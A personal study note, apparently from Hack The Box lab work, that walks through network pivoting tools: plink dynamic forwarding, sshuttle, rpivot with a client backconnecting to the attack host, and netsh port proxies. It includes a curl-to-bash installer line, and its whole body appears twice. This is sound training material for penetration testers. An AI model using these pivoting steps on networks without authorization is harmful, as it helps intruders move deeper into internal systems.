Others tools for pivoting

AnteriorSocat Redirection with a Bind Shell SiguienteTransferencias de Archivos

Última actualización hace 7 meses

Others tools for pivoting

SSH for Windows: plink.exe

Using Plink.exe

plink -ssh -D 9050 ubuntu@10.129.15.50

SSH Pivoting with Sshuttle

b0ySie7e@htb[/htb]$ sudo apt-get install sshuttle

Running sshuttle

b0ySie7e@htb[/htb]$ sudo sshuttle -r ubuntu@10.129.202.64 172.16.5.0/23 -v

Traffic Routing through iptables Routes

b0ySie7e@htb[/htb]$ nmap -v -sV -p3389 172.16.5.19 -A -Pn

Web Server Pivoting with Rpivot

Cloning rpivot

b0ySie7e@htb[/htb]$ git clone https://github.com/klsecservices/rpivot.git

Installing Python2.7

b0ySie7e@htb[/htb]$ sudo apt-get install python2.7

Alternative Installation of Python2.7

b0ySie7e@htb[/htb]$ curl https://pyenv.run | bash
b0ySie7e@htb[/htb]$ echo 'export PYENV_ROOT="$HOME/.pyenv"' >> ~/.bashrc
b0ySie7e@htb[/htb]$ echo 'command -v pyenv >/dev/null || export PATH="$PYENV_ROOT/bin:$PATH"' >> ~/.bashrc
b0ySie7e@htb[/htb]$ echo 'eval "$(pyenv init -)"' >> ~/.bashrc
b0ySie7e@htb[/htb]$ source ~/.bashrc
b0ySie7e@htb[/htb]$ pyenv install 2.7
b0ySie7e@htb[/htb]$ pyenv shell 2.7

Running server.py from the Attack Host

b0ySie7e@htb[/htb]$ python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0

Transfering rpivot to the Target

b0ySie7e@htb[/htb]$ scp -r rpivot ubuntu@<IpaddressOfTarget>:/home/ubuntu/

Running client.py from Pivot Target

ubuntu@WEB01:~/rpivot$ python2.7 client.py --server-ip 10.10.14.18 --server-port 9999

Backconnecting to server 10.10.14.18 port 9999

Confirming Connection is Established

New connection from host 10.129.202.64, source port 35226

Browsing to the Target Webserver using Proxychains

proxychains firefox-esr 172.16.5.135:80

Connecting to a Web Server using HTTP-Proxy & NTLM Auth

python client.py --server-ip <IPaddressofTargetWebServer> --server-port 8080 --ntlm-proxy-ip <IPaddressofProxy> --ntlm-proxy-port 8081 --domain <nameofWindowsDomain> --username <username> --password <password>

Port Forwarding with Windows Netsh

![[Pasted image 20241019011744.png]]

Using Netsh.exe to Port Forward

C:\Windows\system32> netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.15.150 connectport=3389 connectaddress=172.16.5.25

Verifying Port Forward

C:\Windows\system32> netsh.exe interface portproxy show v4tov4

Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
10.129.42.198   8080        172.16.5.25     3389

AnteriorSocat Redirection with a Bind Shell SiguienteTransferencias de Archivos

Última actualización hace 7 meses

SSH for Windows: plink.exe

Using Plink.exe

plink -ssh -D 9050 ubuntu@10.129.15.50

SSH Pivoting with Sshuttle

b0ySie7e@htb[/htb]$ sudo apt-get install sshuttle

Running sshuttle

b0ySie7e@htb[/htb]$ sudo sshuttle -r ubuntu@10.129.202.64 172.16.5.0/23 -v

Traffic Routing through iptables Routes

b0ySie7e@htb[/htb]$ nmap -v -sV -p3389 172.16.5.19 -A -Pn

Web Server Pivoting with Rpivot

Cloning rpivot

b0ySie7e@htb[/htb]$ git clone https://github.com/klsecservices/rpivot.git

Installing Python2.7

b0ySie7e@htb[/htb]$ sudo apt-get install python2.7

Alternative Installation of Python2.7

b0ySie7e@htb[/htb]$ curl https://pyenv.run | bash
b0ySie7e@htb[/htb]$ echo 'export PYENV_ROOT="$HOME/.pyenv"' >> ~/.bashrc
b0ySie7e@htb[/htb]$ echo 'command -v pyenv >/dev/null || export PATH="$PYENV_ROOT/bin:$PATH"' >> ~/.bashrc
b0ySie7e@htb[/htb]$ echo 'eval "$(pyenv init -)"' >> ~/.bashrc
b0ySie7e@htb[/htb]$ source ~/.bashrc
b0ySie7e@htb[/htb]$ pyenv install 2.7
b0ySie7e@htb[/htb]$ pyenv shell 2.7

Running server.py from the Attack Host

b0ySie7e@htb[/htb]$ python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0

Transfering rpivot to the Target

b0ySie7e@htb[/htb]$ scp -r rpivot ubuntu@<IpaddressOfTarget>:/home/ubuntu/

Running client.py from Pivot Target

ubuntu@WEB01:~/rpivot$ python2.7 client.py --server-ip 10.10.14.18 --server-port 9999

Backconnecting to server 10.10.14.18 port 9999

Confirming Connection is Established

New connection from host 10.129.202.64, source port 35226

Browsing to the Target Webserver using Proxychains

proxychains firefox-esr 172.16.5.135:80

Connecting to a Web Server using HTTP-Proxy & NTLM Auth

python client.py --server-ip <IPaddressofTargetWebServer> --server-port 8080 --ntlm-proxy-ip <IPaddressofProxy> --ntlm-proxy-port 8081 --domain <nameofWindowsDomain> --username <username> --password <password>

Port Forwarding with Windows Netsh

![[Pasted image 20241019011744.png]]

Using Netsh.exe to Port Forward

C:\Windows\system32> netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.15.150 connectport=3389 connectaddress=172.16.5.25

Verifying Port Forward

C:\Windows\system32> netsh.exe interface portproxy show v4tov4

Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
10.129.42.198   8080        172.16.5.25     3389